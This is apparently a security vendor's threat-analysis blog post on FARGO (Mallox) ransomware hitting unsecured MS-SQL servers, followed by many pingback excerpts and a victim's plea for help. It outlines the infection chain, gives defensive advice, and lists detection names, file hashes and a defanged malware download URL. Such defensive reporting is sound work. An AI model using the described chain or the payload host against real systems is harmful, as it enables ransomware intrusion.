The ASEC analysis team is constantly monitoring malware distributed to unsecured MS-SQL servers. The analysis team has recently discovered the distribution of FARGO ransomware that is targeting unsecured MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware that targets unsecured MS-SQL servers. In the past, it was also called the Mallox because it used the file extension .mallox.
– [ASEC Blog] Cobalt Strike Being Distributed to Unsecured MS-SQL Servers
– [ASEC Blog] Cobalt Strike Being Distributed to Unsecured MS-SQL Servers (2)
– [ASEC Blog] Coin Miner Being Distributed to Unsecured MS-SQL Servers
– [ASEC Blog] AsyncRAT Malware Being Distributed to Unsecured MS-SQL Servers
As shown in the process tree in Figure 1, the file downloaded by the MS-SQL process through cmd.exe and powershell.exe is a file built on .Net (see Figure 2), downloads and loads additional malware from a particular address. The loaded malware generates and executes a BAT file which shuts down certain processes and services, in the %temp% directory.
The ransomware’s behavior begins by being injected into AppLaunch.exe, a normal Windows program. It attempts to delete a registry key on a certain path (see Figure 5), and executes the recovery deactivation command, and closes certain processes (see Figure 6). As shown in the figures below, the closed processes are SQL programs.
When the ransomware encrypts files, files with file extensions shown in Table 1 are excluded from infection. The characteristic aspect is that it does not infect files with a file extension associated with Globeimposter and this exclusion list does not only include the same type of extensions of .FARGO .FARGO2 and .FARGO3 but also includes .FARGO4, which is thought to be a future version of the ransomware.
Figure 7 shows a screen capture of the ransom note and the infected file on the top right in the same screen. As shown in the figure, the encrypted file gets a file name of OriginalFileName.FileExtension.Fargo3 and the ransom note is generated with the filename ‘RECOVERY FILES.txt’.
Typical attacks that target database servers (MS-SQL, MySQL servers) include brute force attacks and dictionary attacks on systems where account credentials are poorly being managed. And there may be vulnerability attacks on systems that do not have a vulnerability patch applied.
Administrators of MS-SQL servers should use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute force attacks and dictionary attacks, and update to the latest patch to prevent any potential vulnerability attacks.
AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:
[File Detection]
– Ransomware/Win.Ransom.C5153317(2022.06.02.01)
– Dropper/Win.DotNet.C5237010(2022.09.14.03)
– Downloader/Win.Agent.R519342(2022.09.15.03)
– Trojan/BAT.Disabler (2022.09.16.00)
Behavior Detection]
– Malware/MDP.Download.M1197
[IOC]
MD5
– b4fde4fb829dd69940a0368f44fca285
– c54daefe372efa4ee4b205502141d360
– 4d54af1bbf7357964db5d5be67523a7c
–41bcad545aaf08d4617c7241fe36267c
Download
– hxxp://49.235.255[.]219:8080/Pruloh_Matsifkq.png
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information
[…] FARGO Ransomware (Mallox) est distribué aux serveurs MS-SQL vulnérables […]
[…] researchers at AhnLab Security Emergency Response Center (ASEC) say that FARGO is one of the most prominent ransomware strains that focus on MS-SQL servers, along […]
[…] researchers at AhnLab Security Emergency Response Center (ASEC) say that FARGO is one of the most prominent ransomware strains that focus on MS-SQL servers, along with […]
[…] FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers […]
[…] researchers at AhnLab Security Emergency Response Center (ASEC) say that FARGO is one of the most prominent ransomware strains that focus on MS-SQL servers, along […]
[…] researchers at AhnLab Security Emergency Response Center (ASEC) say that FARGO is one of the most prominent ransomware strains that focus on MS-SQL servers, along […]
[…] researchers at AhnLab Security Emergency Response Center (ASEC) say that FARGO is one of the most prominent ransomware strains that focus on MS-SQL servers, along […]
[…] は常にサイバー犯罪者の攻撃の標的になっています。また、AhnLab Security Emergency Response Center (ASEC) は、脆弱な Microsoft SQL サーバーを標的とする FARGO […]
[…] current report from the safety evaluation group of AhnLab Safety Emergency Response Heart (ASEC) reveals a brand new cybercriminal exercise distributing FARGO ransomware that targets […]
[…] rapport récent de l’équipe d’analyse de la sécurité du AhnLab Security Emergency Response Center (ASEC) révèle une nouvelle activité cybercriminelle distribuant le rançongiciel FARGO qui cible […]
[…] popular ransomware programs like GlobeImposter, the FARGO ransomware is also most well-known for targeting the Microsoft SQL Server databases that are vulnerable. This ransomware has also been known as […]
[…] recent rapport van het beveiligingsanalyseteam van het AhnLab Security Emergency Response Center (ASEC) onthult een nieuwe cybercriminele activiteit die FARGO-ransomware verspreidt die zich richt […]
[…] 圖1 – 進程樹(來自:AhnLab) […]
[…] kamakailang ulat mula sa security analysis team ng AhnLab Security Emergency Response Center (ASEC) ay nagpapakita ng isang bagong aktibidad sa cybercriminal na namamahagi ng FARGO ransomware […]
[…] báo cáo gần đây từ nhóm phân tích bảo mật của Trung tâm Ứng cứu Khẩn cấp Bảo mật AhnLab (ASEC) tiết lộ một hoạt động tội phạm mạng mới phân phối ransomware FARGO […]
[…] julkaistu AhnLab Security Emergency Response Centerin (ASEC) paljastaa uuden kyberrikollisen toiminnan, joka levittää FARGO-kiristysohjelmia, jotka […]
[…] continue to face attacks. The latest campaign is spreading the Fargo strain of ransomware, according to researchers at South Korea’s AhnLab. Their report doesn’t specify how the servers are compromised. But it does say SQL Server is […]
[…] continue to face attacks. The latest campaign is spreading the Fargo strain of ransomware, according to researchers at South Korea’s AhnLab. Their report doesn’t specify how the servers are compromised. But it does say SQL Server is […]
[…] researchers at AhnLab Security Emergency Response Center (ASEC) say that FARGO is one of the most prominent ransomware strains that focus on MS-SQL servers, along with […]
[…] popular ransomware programs like GlobeImposter, the FARGO ransomware is also most well-known for targeting the Microsoft SQL Server databases that are vulnerable. This ransomware has also been known as […]
[…] warning comes in a blog posting from analysts at the AhnLab Security Emergency Response Center (ASEC), which says that Fargo is one […]
[…] warning comes in a blog posting from analysts at the AhnLab Security Emergency Response Center (ASEC), which says that Fargo is one […]
[…] terbaru daripada pasukan analisis keselamatan Pusat Tindak Balas Kecemasan Keselamatan AhnLab (ASEC) mendedahkan aktiviti penjenayah siber baharu yang mengedarkan perisian tebusan FARGO yang […]
[…] AhnLab Security Emergency Response Center (ASEC) egy új kiberbűnözői tevékenységet tár fel FARGO ransomware terjesztésére, amely […]
[…] AhnLab Security Emergency Response Center (ASEC) […]
[…] προειδοποίηση έρχεται σε α ανάρτηση ιστολογίου από αναλυτές στο AhnLab Security Emergency Response Center (ASEC), το οποίο […]
[…] warning comes in a blog posting from analysts at the AhnLab Security Emergency Response Center (ASEC), which says that Fargo is one […]
[…] warning comes in a blog posting from analysts at the AhnLab Security Emergency Response Center (ASEC), which says that Fargo is one […]
[…] warning comes in a blog posting from analysts at the AhnLab Security Emergency Response Center (ASEC), which says that Fargo is one […]
[…] researchers at AhnLab Security Emergency Response Center (ASEC) say that FARGO is one of the most prominent ransomware strains that focus on MS-SQL servers, along with […]
[…] FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers […]
[…] warning is available in a weblog posting from analysts on the AhnLab Safety Emergency Response Heart (ASEC), which says that Fargo is likely […]
[…] warning is available in a blogging analysts from AhnLab Safety Emergency Response Heart (ASEC), who declare that Fargo is without […]
[…] Microsoft SQL 數據庫繼續面臨攻擊。 最新的活動正在傳播 Fargo 勒索軟件, 據韓國 AhnLab 的研究人員稱. 他們的報告沒有具體說明服務器是如何被入侵的。 但它確實說 SQL Server […]
[…] einem Bericht von Sicherheitsforschern des AhnLab Security Emergency Response Centers (ASEC) ist FARGO neben […]
[…] continue to face attacks. The latest campaign is spreading the Fargo strain of ransomware, according to researchers at South Korea’s AhnLab. Their report doesn’t specify how the servers are compromised. But it does say SQL Server is […]
[…] “The loaded malware generates and executes a BAT file which shuts down certain processes and services, in the %temp% directory,” the researchers explained. […]
[…] e executa um arquivo BAT que encerra certos processos e serviços, no diretório %temp%”, explicaram os pesquisadores […]
[…] AhnLab Security Emergency Response Center (ASEC) မှ လုံခြုံရေး သုတေသီတွေက FARGO က GlobeImposter နှင့်အတူ MS-SQL servers တွေ ပေါ်မှာ အဓိကထား လုပ်ဆောင်တဲ့ အထင်ရှားဆုံး ransomware strains တွေထဲမှ တစ်ခု ဖြစ်ကြောင်း ပြောကြား ခဲ့ပါတယ်။ […]
[…] AhnLab Security Emergency Response Center (ASEC) မှ လုံခြုံရေး သုတေသီတွေက FARGO က GlobeImposter နှင့်အတူ MS-SQL servers တွေ ပေါ်မှာ အဓိကထား လုပ်ဆောင်တဲ့ အထင်ရှားဆုံး ransomware strains တွေထဲမှ တစ်ခု ဖြစ်ကြောင်း ပြောကြား ခဲ့ပါတယ်။ […]
[…] po raz kolejny stały się głównym celem nowej fali ataków ransomware. Badacze z centrum ASEC (AhnLab Security Emergency Response Center) opisali nowe zagrożenie pod nazwą FARGO (znowu […]
[…] Microsoft SQL-Server wurden mit FARGO-Malware gehackt […]
[…] AhnLab সিকিউরিটি ইমার্জেন্সি রেসপন্স সেন… (ASEC) এর নিরাপত্তা বিশ্লেষণ দলের একটি সাম্প্রতিক প্রতিবেদন ) FARGO র্যানসমওয়্যার বিতরণ করে একটি নতুন সাইবার অপরাধমূলক কার্যকলাপ প্রকাশ করে যা দুর্বল Microsoft SQL সার্ভারকে লক্ষ্য করে৷ […]
[…] πρόσφατη αναφορά από την ομάδα ανάλυσης ασφαλείας του Κέντρου αντιμετώπισης έκτακτης ανάγκης της AhnLab Security (ASEC ) αποκαλύπτει μια νέα εγκληματική δραστηριότητα […]
[…] FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers […]
[…] FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers […]
[…] Fargo (Mallox) ransomware being distributed to unsecured MS-SQL servers […]
[…] warning comes in a blog post by analysts at AhnLab Security Emergency Response Center (ASEC) stating that Fargo is one of the […]
i’m mahmoud from iran . I am a teacher who has not been able to get an antivirus for my computer due to economic sanctions.
Unfortunately, my computer has been attacked by ransomware And the person in question has requested a cryptocurrency .
We live in a country that is governed by a dictatorship and we cannot provide any software And we are not connected to anywhere in the world and we cannot fulfill this hacker’s request.
All my computer files containing my teaching files for children are encrypted And at the end of each file name is the word FARGO3 .
I want you to help me to find a way to return these files.
I know that there may be softwares that can neutralize this encryption, but I cannot download these softwares in Iran.
If there is a way, please let me know or I will email all these files to you via zip file and recover it and return it to me.
With this favor, you can help a teacher and a large number of students .
Thanks and best regards
Mahmoud
my email : hs.commercial@gmail.com
[…] FARGO Ransomware distribution […]